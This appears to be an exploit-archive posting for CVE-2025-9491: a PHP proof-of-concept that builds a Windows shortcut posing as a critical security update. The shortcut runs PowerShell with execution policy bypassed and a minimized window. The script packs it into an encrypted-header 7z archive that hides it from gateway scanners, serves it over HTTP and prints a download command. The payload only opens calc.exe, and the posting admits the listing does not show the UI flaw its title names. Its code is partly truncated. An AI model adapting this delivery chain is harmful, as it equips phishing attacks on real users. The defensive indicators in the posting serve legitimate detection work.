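=============================================================================================================================================
| # Title : Windows LNK File UI Misrepresentation Vulnerability Leading to Remote Code Execution |
| # Author : indoushka |
| # Tested on : Windows 11 Fr (Pro) / browser : Mozilla Firefox 145.0.2 (64 bits) |
| # Vendor : System built‑in component. No standalone download available |
=============================================================================================================================================

[+] References : https://packetstorm.news/files/id/212542/ & CVE-2025-9491

[+] Summary : This PHP script is a Proof-of-Concept (PoC) tool that demonstrates how to:

    - Create a Windows LNK (shortcut) file that executes a PowerShell command (in this example, it launches calc.exe).
    - Package the LNK file into a 7-Zip archive, optionally with a password.
    - Host the archive on a simple HTTP server using PHP’s built-in server.
    - Provide a PowerShell command that can download the archive from the HTTP server.

    It is meant for educational and defensive testing, not exploitation. The script itself does not exploit a real vulnerability — it simply shows the technique of delivering a PowerShell command through an LNK file. As written, the shortcut's arguments are set as an ordinary string, so the listing appears not to reproduce the UI misrepresentation named in the title. For defenders, the artifacts visible in the listing are a .lnk file delivered inside a .7z archive, a shortcut whose target is powershell.exe with -NoProfile -ExecutionPolicy Bypass, a minimized window style (7), and an icon and description that imitate a Windows update. When a password is set, the -mhe=on switch also encrypts the archive's file list, so a gateway scanner cannot see the .lnk inside and inspection has to happen on the endpoint after extraction.

[+] Key technical points:

    - Uses Windows COM to create the LNK file.
    - Falls back to PowerShell if COM fails.
    - Optionally compresses with 7-Zip.
    - Prepares PHP's built-in HTTP server to serve the payload (the script prints the command and writes start_server.bat; it does not launch the server itself).
    - Designed to be run from the CLI on Windows.

    Note: the beginning of the listing (the opening PHP tag and the class declaration down to the start of the constructor) is missing from this copy, so the code below begins mid-constructor; the router script body in startHTTPServer is also empty in this copy.

POC : php poc.php
scriptDir = $this->getScriptDirectory(); $this->localIP = $this->getLocalIP(); } private function getScriptDirectory() { return dirname(__FILE__); } private function getLocalIP() { $ip = gethostbyname(gethostname()); // محاولة الحصول على IP حقيقي $sock = socket_create(AF_INET, SOCK_DGRAM, SOL_UDP); socket_connect($sock, "8.8.8.8", 53); socket_getsockname($sock, $ip); socket_close($sock); return $ip; } public function createMaliciousLNK() { $lnkPath = $this->scriptDir . 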
'\\Critical_Update.lnk'; echo "[*] Creating malicious LNK file...\n"; try { // في PHP على Windows، يمكن استخدام COM $shell = new COM('WScript.Shell'); $shortcut = $shell->CreateShortcut($lnkPath); $shortcut->TargetPath = 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe'; $shortcut->Arguments = '-NoProfile -ExecutionPolicy Bypass -Command "Start-Process calc.exe; echo Windows Update Completed"'; $shortcut->WorkingDirectory = 'C:\\Windows\\System32'; $shortcut->Description = 'Critical Windows Security Update - KB5029244'; // محاولة تعيين أيقونة $iconPaths = [ 'C:\\Windows\\System32\\shell32.dll', 'C:\\Windows\\System32\\imageres.dll', ]; foreach ($iconPaths as $iconPath) { if (file_exists($iconPath)) { $shortcut->IconLocation = $iconPath . ',78'; break; } } $shortcut->WindowStyle = 7; // SW_SHOWMINNOACTIVE $shortcut->Save(); if (file_exists($lnkPath)) { echo "[+] LNK created: $lnkPath\n"; return $lnkPath; } else { return null; } } catch (Exception $e) { echo "[-] Error: " . $e->getMessage() . "\n"; // طريقة بديلة باستخدام PowerShell return $this->createLNKWithPowerShell(); } } private function createLNKWithPowerShell() { $lnkPath = $this->scriptDir . 
'\\Critical_Update.lnk'; $psScript = " \$WshShell = New-Object -ComObject WScript.Shell \$Shortcut = \$WshShell.CreateShortcut('$lnkPath') \$Shortcut.TargetPath = 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe' \$Shortcut.Arguments = '-NoProfile -ExecutionPolicy Bypass -Command \"Start-Process calc.exe; echo Windows Update Completed\"' \$Shortcut.WorkingDirectory = 'C:\\Windows\\System32' \$Shortcut.Description = 'Critical Windows Security Update - KB5029244' \$Shortcut.IconLocation = 'C:\\Windows\\System32\\shell32.dll,78' \$Shortcut.WindowStyle = 7 \$Shortcut.Save() "; $psScript = base64_encode(iconv('UTF-8', 'UTF-16LE', $psScript)); $command = "powershell -ExecutionPolicy Bypass -EncodedCommand $psScript"; exec($command, $output, $returnCode); if (file_exists($lnkPath)) { echo "[+] LNK created via PowerShell: $lnkPath\n"; return $lnkPath; } return null; } public function compressWith7Zip($lnkPath, $password = null) { if (!$lnkPath || !file_exists($lnkPath)) { echo "[-] LNK file not found\n"; return null; } // البحث عن 7-Zip $sevenZipPaths = [ 'C:\\Program Files\\7-Zip\\7z.exe', 'C:\\Program Files (x86)\\7-Zip\\7z.exe', '7z.exe', ]; $sevenZip = null; foreach ($sevenZipPaths as $path) { if (file_exists($path)) { $sevenZip = $path; break; } } if (!$sevenZip) { // البحث في PATH exec('where 7z', $output, $returnCode); if ($returnCode === 0) { $sevenZip = '7z'; } else { echo "[-] 7-Zip not found\n"; return null; } } $archiveName = $this->scriptDir . '\\update.7z'; // بناء الأمر $cmd = escapeshellarg($sevenZip) . " a " . escapeshellarg($archiveName) . " " . escapeshellarg($lnkPath); if ($password) { $cmd .= " -p" . 
escapeshellarg($password); } $cmd .= " -mx9 -mhe=on -t7z"; echo "[*] Compressing with 7-Zip...\n"; exec($cmd, $output, $returnCode); if ($returnCode === 0 && file_exists($archiveName)) { echo "[+] Archive created: $archiveName\n"; if ($password) { echo "[+] Password: $password\n"; } return $archiveName; } else { echo "[-] Compression failed\n"; return null; } } public function startHTTPServer($port = 8080) { echo "[+] Starting PHP built-in server on http://{$this->localIP}:$port\n"; echo "[+] Download URL: http://{$this->localIP}:$port/update.7z\n"; echo "[+] Server running... Press Ctrl+C to stop\n"; $publicDir = $this->scriptDir; // إنشاء ملف router بسيط $routerScript = $publicDir . '\\router.php'; $routerContent = ''; file_put_contents($routerScript, $routerContent); // تشغيل الخادم $command = "php -S {$this->localIP}:$port -t " . escapeshellarg($publicDir) . " " . escapeshellarg($routerScript); echo "Command: $command\n"; echo "You need to run this command manually in another terminal:\n"; echo $command . "\n\n"; // بدلاً من ذلك، يمكن استخدام exec() مع nohup على Unix-like systems // على Windows، يمكن استخدام start if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') { $cmdFile = $publicDir . '\\start_server.bat'; $batchContent = "@echo off\nstart /B $command\n"; file_put_contents($cmdFile, $batchContent); echo "[+] Created batch file: $cmdFile\n"; echo "[+] Run it in a new terminal window\n"; } } public function main() { echo str_repeat("=", 60) . "\n"; echo "CVE-2025-9491 LNK Exploit + 7-Zip + HTTP Server (PHP Version)\n"; echo str_repeat("=", 60) . "\n"; // التحقق من نظام التشغيل if (strtoupper(substr(PHP_OS, 0, 3)) !== 'WIN') { echo "[-] This script requires Windows OS\n"; return; } // إنشاء ملف LNK $lnkFile = $this->createMaliciousLNK(); if (!$lnkFile) { echo "[-] Failed to create LNK\n"; return; } // ضغط مع 7-Zip echo "\n[*] Compress with 7-Zip? 
(y/n): "; $compress = trim(strtolower(fgets(STDIN))); if ($compress === 'y') { echo "[*] Password (optional): "; $password = trim(fgets(STDIN)); if (empty($password)) { $password = null; } $archive = $this->compressWith7Zip($lnkFile, $password); if ($archive) { echo "\n[+] Archive ready: $archive\n"; // بدء خادم HTTP echo "\n[*] Start HTTP server? (y/n): "; $startServer = trim(strtolower(fgets(STDIN))); if ($startServer === 'y') { $this->startHTTPServer(); } echo "\n[+] PowerShell download command:\n"; echo " iwr http://{$this->localIP}:8080/update.7z -OutFile update.7z\n"; // الانتظار للإدخال echo "\n[*] Press Enter to exit..."; fgets(STDIN); } else { echo "[-] Compression failed\n"; echo "[*] Use raw LNK: $lnkFile\n"; } } else { echo "\n[*] Raw LNK file: $lnkFile\n"; } } public function generatePowerShellDownloadCommand() { return "iwr http://{$this->localIP}:8080/update.7z -OutFile update.7z"; } } // التنظيف التلقائي register_shutdown_function(function() { // يمكن إضافة تنظيف الملفات المؤقتة هنا }); // التنفيذ if (PHP_SAPI === 'cli') { $exploit = new WindowsLNKExploit(); $exploit->main(); } else { echo "This script must be run from command line (CLI)\n"; echo "Usage: php " . basename(__FILE__) . "\n"; } // وظائف مساعدة إضافية class HelperFunctions { public static function checkRequirements() { $checks = [ 'PHP Version' => version_compare(PHP_VERSION, '7.0.0', '>='), 'Windows OS' => (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN'), 'COM Support' => extension_loaded('com_dotnet'), 'Exec Function' => function_exists('exec'), ]; return $checks; } public static function showBanner() { $banner = " ╔═══════════════════════════════════════════════════════════╗ ║ CVE-2025-9491 PoC ║ ║ Author: indoushka ║ ╚═══════════════════════════════════════════════════════════╝ "; echo $banner . 
"\n"; } } // بديل لاستخدام threading في PHP class BackgroundProcess { public static function runInBackground($command) { if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') { pclose(popen("start /B " . $command, "r")); } else { exec($command . " > /dev/null 2>&1 &"); } } } ?> Greetings to :===================================================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)| ===================================================================================================